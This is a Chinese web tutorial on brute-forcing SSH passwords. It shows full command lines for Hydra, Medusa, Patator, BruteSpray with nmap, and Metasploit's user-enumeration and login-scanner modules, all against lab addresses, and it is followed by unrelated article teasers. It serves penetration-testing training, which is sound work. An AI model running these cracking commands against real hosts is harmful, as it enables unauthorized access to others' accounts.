SSH暴力破解实战

一.hydra【海德拉】

海德拉(Hydra):希腊神话中的九头蛇,是西方的神话生物,在古希腊神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。
Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。

1.指定用户破解:

hydea -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.1680.0/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -p pws.txt -M targets.txt ssh
hydra -l root -P pass.list 192.168.75.158 ssh

    2.用户列表破解:

    hydra -L userlist.txt -P passlist.txt 192.168.75.158 ssh
    hydra -L userlist.txt -P passlist.txt -M hostlist.txt ssh
    hydra -l root -P pass.list 192.168.75.158 ssh -o hydrassh.txt
    

    二.medusa[美杜莎]

    美杜莎是希腊神话里的一个女妖怪,她的头发是毒蛇,长的青面獠牙,她知道自丑,她要报复,她把见过她的人都变成了石头。据说她原是一位美丽的少女,之所以变成蛇发女妖是因为梅杜莎和智慧女神雅典娜比美,雅典娜一怒之下将梅杜莎的头发变成毒蛇,变成面目丑陋的怪物。
    Medusa[美杜莎]是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机、用户或密码执行强力测试。Medusa和Hydra一样,同样于在线密码破解工具。不同的是,Medusa的稳定性相较于Hydra要好很多,但其支持模块要比Hydra少一些。
    Medusa [ -h host | -H file] [ -u username | -U file] [-p password | -p file ] [ -C file ]

    选项功能说明
    -h [TEXT]目标主机名称或者IP地址
    -H [FILE]包含目标主机名称或者IP地址文件
    -u [TEXT]测试的用户名
    -U [FILE]包含测试的用户名文件
    -p [TEXT]测试的密码
    -P [FILE]包含测试的密码文件
    -C [FILE]组合条目文件
    -O [FILE]日志信息文件
    -e [n/s/ns]n代表空密码,s代表为密码与用户名相同
    -M [TEXT]模块执行名称
    -m [TEXT]传递参数到模块
    -d显示所有的模块名称
    -n [NUM]使用非默认Tcp端口
    -s启用SSl
    -r [NUM]重试间隔时间,默认未3秒
    -t [NUM]设定线程数量
    -T同时测试的主机总数
    -L并行化,每个用户使用一个线程
    -f在任何主机上找到第一个账号/密码后,停止破解
    -F在任何主机上找到第一个有效的用户名/密码后停止审计
    -q显示模块的使用信息
    -v [NUM]详细级别(0-6)
    -w [NUM]错误调试级别(0-10)
    -V显示版本
    -Z [TEXT]继续扫描上一次

    medusa -M ssh -u root -P pass.list -h 192.168.75.158
    medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt
    medusa -M ssh -u root -P pass.list -h 192.168.75.158 -O medusa.txt

    三.Patator强大的命令行暴力破解器

    查看模块: #patator
    查看模块具体用法:#patator --ssh_login --help
    #patator ssh_login host=192.168.75.158 user=root password=FILE0 0=passlist.txt
    #patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list
    #patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list -x ignore:mesg=‘Authentication failed.’

    四.BrutesPray

    BrutesPray是一款基于nmap扫描输出的gnmap/XML文件。自动调用Medusa对服务进行爆破。

    1.安装brutespray

    #apt-get update
    #apt-get install brutespray

    2.语法参数:

    选项功能说明
    -f或 --flie接一个文件名, 解析nmap输出的 GNMAP 或者 XML 文件
    -s或 --service 接一个服务名, 指定要攻击的服务
    -t 或 --threads接一数值,指定线程数
    -T 或 --hosts接一数值,指定同时测试的主机数
    -U 或 --userlist 接一个用户字典文件
    -P 或 --passlist 接一个密码字典文件
    -u 或 --username接用户名,指定一个用户名进行爆破
    -p 或 --password接一个密码,指定一个密码进行爆破
    -c 或 --continuous 成功之后继续爆破
    -I 或 --interactive 交互模式

    3.Nmap扫描常用命令

    命令功能说明
    nmap -ip地址
    nmap -v ip地址显示扫描过程
    nmap -p80,8080指定端口扫描
    nmap -A ip综合扫描
    nmap -O ip扫描主机操作系统
    nmap -iL 文件扫描指定文件中的IP
    nmap -sS SYN扫描使用SYN半开放扫描
    nmap -sT TCP扫描扫描开放了TCP端口的设备
    nmap -F快速扫描
    nmap -sV版本检测 用于扫描目标主机服务版本号. 探测打开的端口以确定服务/版本信息
    nmap -sRRPC扫描
    nmap -sU探测那些UDP端口开放
    nmap -sO用于判断目标主机上使用的是神魔协议 探测目标主机支持哪些IP协议
    nmap -oX表示以xml的格式输出结果到以文件
    -P0跳过ping的探测,可以加快扫描速度.
    -sPping扫描
    -T [0-6]设置定时模板(越高越快)

    4.对SSH密码进行爆破

    #nmap -sV -p 22 192.168.75.0/24 -oX nmaplive.xml
    #brutespray --file nmaplive.xml -u root -P pass.list -c
    #cat /root/brutespray-output/22-ssh-success.txt   查看爆破成功的文件内容
    

      五.Metasploit Framework

      Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。
      #msfconsole
      msf > search ssh

      1.MSF枚举(找用户)

      msf > use auxiliary/scanner/ssh/ssh_enumusers 
      msf auxiliary(scanner/ssh/ssh_enumusers) > show options 
      msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.75.158   设置目标主机
      msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/user.list
      msf auxiliary(scanner/ssh/ssh_enumusers) > set threads 10
      msf auxiliary(scanner/ssh/ssh_enumusers) > show options
      msf auxiliary(scanner/ssh/ssh_enumusers) > run
      

        2.MSF版本探测

        msf > use auxiliary/scanner/ssh/ssh_version
        msf auxiliary(scanner/ssh/ssh_version) > show options
        msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.75.158
        msf auxiliary(scanner/ssh/ssh_version) > show options
        msf auxiliary(scanner/ssh/ssh_version) > run
        

          3.MSF暴力破解

          msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
          msf auxiliary(scanner/ssh/ssh_login) > show options
          msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.75.158
          msf auxiliary(scanner/ssh/ssh_login) > set pass_file /root/pass.list
          msf auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.list
          msf auxiliary(scanner/ssh/ssh_login) > run
          

          本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358881.shtml

          如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

          相关文章

          前端工程师必备谷歌浏览器F12下的调试知识点

          chrome浏览器版本(所有的操作都是基于我电脑上目前这个版本。) 进入开发者工具的方式:F12 (所有浏览器都可以用F12进入开发者工具),ChromeDev(开发者工具简称)按照类别可以分为下面几种 审查元素 ctrl+shift+c 在页面上选择一个HTML元素并审查它 切换浏览设备 ctrl+…

          java createjpeg4_在linux下用java的JPEGCodec.createJPEGEncoder(bos)生成jpg图片问题

          在rh8 linux 下用java的JPEGCodec.createJPEGEncoder(bos)生成jpg图片,XServer已启动。出现如下问题错误提示如下java.lang.InternalError: Cant connect to X11 window server using :0.0 as the value of the DISPLAY variable…

          ASP.Net string 类的扩展方法 [转]

          string 类的扩展方法列表(基本相同于 IEnumerable<T> 接口的成员列表): Aggregate<> //累加 All<> //是否都满足条件 Any<> //是否有一个满足条件 AsEnumerable<> // AsParallel<> …

          Netflix Archaius用于物业管理–基础知识

          Netflix Archaius提供了一组精巧的功能&#xff0c;可将动态属性加载到应用程序中。 这篇博客文章只是我所了解的Archaius范围的文档&#xff0c;比我在这里所记录的内容要多得多&#xff0c;但这应该提供一个很好的开始&#xff1a; 默认行为 考虑一个简单的属性文件&#x…

          程序员应该如何提问?

          提问是软件开发的一个不可避免的环节&#xff0c;各种思想火花地碰撞往往能产生奇妙的结果&#xff0c;但是作为一名傲娇霸气君临天下人见人爱花见花开炒鸡屌的程序员&#xff0c;你是否真的思考和总结过自己的提问方式呢&#xff1f;如何去问一个让双方都满意的好问题并最大程…

          Kali利用msf对MS10_061漏洞进行渗透测试

          注意事项&#xff1a; kail首次打开metasploit&#xff0c;会初始化数据&#xff0c;可能会有点慢&#xff0c;请耐心等待&#xff01;本文仅供学习漏洞渗透测试&#xff0c;不得用于其他非法用途&#xff0c;否则造成的任何后果自负&#xff01;&#xff01;&#xff01; 1.…

          如何判断ios设备中是否安装了某款应用

          URL Schemes关键字研究一下即可 常见得URL Schemes见http://www.cnblogs.com/huangzs/p/4491286.html if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:"alipay://"]]) { NSLog(" installed"); NSURL *url [NSURL URLWithStr…

          java初始化数组的时候给多少长度_java二维数组的初始化及使用其长度

          二维数组的初始化1.静态初始化int intArray[ ][ ]{{1,2},{2,3},{3,4,5}};Java语言中&#xff0c;由于把二维数组看作是数组的数组&#xff0c;数组空间不是连续分配的&#xff0c;所以不要求二维数组每一维的大小相同。2.动态初始化1) 直接为每一维分配空间&#xff0c;格式如下…

          前端大牛都在看的书

          目录结构 HTMLCSSJavaScript正则表达式jQueryNodejsReactVueAngular通信方式数据存储服务端架构与安防算法设计模式开发辅助客户端开发 HTML Head First HTML 与 CSS

          Metaspliot 控制终端利用Samba漏洞渗透

          Samba简介 Samba是linux和unix系统上实现smb协议的一个免费软件&#xff0c;由服务器及客户端程序构成&#xff0c;Samba是面向Linux和Unix环境的Windows互操作性套件。它适用于在可能包括Linux、Unix、Windows、macOS及其他操作系统的异构环境下工作的那些人。Samba使用服务器…

          群里分享的react的收藏一下!今日周末,改了个表单验证然后无所事事了!

          今日周末&#xff0c;改了个表单验证然后无所事事了&#xff0c;然后把昨天群里分享的react的收藏一下尽管现在还在研究angular和nodeJs毕竟刚刚开始用有点不熟...没准以后会研究一下react毕竟看着下面这张图还是觉得有点欢乐的 现在最热门的前端框架&#xff0c;毫无疑问是 Re…

          java的设计模式用的什么软件_《图解Java多线程设计模式》UML用什么软件画?

          eclipse插件 AmaterasUML (下载地址&#xff1a;https://zh.osdn.net/projects/amateras/releases/#21568)解压放到plugins文件夹下在安装AmaterasUML之前要先安装GEF(eclipse在线安装&#xff0c;参考&#xff1a;http://www.cnblogs.com/xiluhua/p/6667935.html)eclipse-File…

          spring bean配置_在运行时交换出Spring Bean配置

          spring bean配置如今&#xff0c;大多数Java开发人员都定期与Spring打交道&#xff0c;而我们当中的许多人都已经熟悉了它的功能和局限性。 最近&#xff0c;我遇到了一个我从未遇到过的问题&#xff1a;引入了基于运行时引入的配置来重新连接Bean内部的功能。 这对于简单的配置…

          HTML教程(看完这篇就够了)

          目录结构 HTML教程 HTML 简介HTML 编辑器HTML基础 HTML 元素HTML 属性HTML 标题HTML 段落HTML 文本格式化HTML 链接HTML headHTML CSSHTML 图像HTML 表格HTML 列表HTML 块级元素HTML 布局HTML 表单

          Metasploit入门用法(主动攻击)

          –作者&#xff1a;CV 本文主要讲metasploit的入门用法&#xff0c;还有一些渗透细节和思路&#xff0c;有不足的&#xff0c;欢迎互相学习研究。本人区别于书籍的特点是&#xff1a;书籍以模块为划分&#xff0c;我是以连续的步骤进行书写&#xff0c;更突出一次渗透的思路&a…

          java 计时器_Java多线程并发容器之并发倒计时器

          从火箭发场景来学习Java多线程并发闭锁对象倒计时器场景在我们开发过程中&#xff0c;有时候会使用到倒计时计数器。最简单的是&#xff1a;int size 5; 执行后&#xff0c;size—这种方式来实现。但是在多线程并发的情况下&#xff0c;这种操作会不安全的。举个现实中最典型的…

          jQuery 图片轮流展示效果

          1. siblings()这个方法&#xff0c;就是要取得调用该方法的节点对象的兄弟节点&#xff08;查找同级对象&#xff09;比如&#xff1a; <div id"aaa"><p>1</p><p>2</p><h1>2</h1><h2>22</h2><div>abcd…

          通过Spring将AWS SQS用作JMS提供程序

          最近AWS公布了新的客户端库&#xff0c;它实现了JMS 1.1规范 &#xff0c;并使用他们的简单队列服务 &#xff08;SQS&#xff09;作为JMS提供者 &#xff08;见杰夫巴尔的帖子在这里 &#xff09;。 在我的文章中&#xff0c;我将向您展示如何设置Maven项目以使用Spring Frame…

          【APICloud系列|15】上架ios应用到苹果应用市场总结

          今年4月初从公司离职啦,这几天学习了很多大前端知识体系,今天收到老板委托把这个遗留的问题处理一下。安卓几个应用商店已经更新了所有的程序,比较简单,一般人都可以很容易上架,对上架到苹果应用市场第一次搞或者老手也会遇到很多坑,这里面主要会涉及到邓白氏编码,苹果开…

          常见网络协议端口号

          一、端口的分类 1&#xff09;按端口性质来分 公认端口&#xff08;常用端口&#xff09;&#xff1a;0-1024 通常这些端口的通信明确表明了某种服务的协议。这些端口是不可以重新定义它的作用对象。 如80端口实际上总是HTTP通信所使用的&#xff0c;而23号端口是Teln…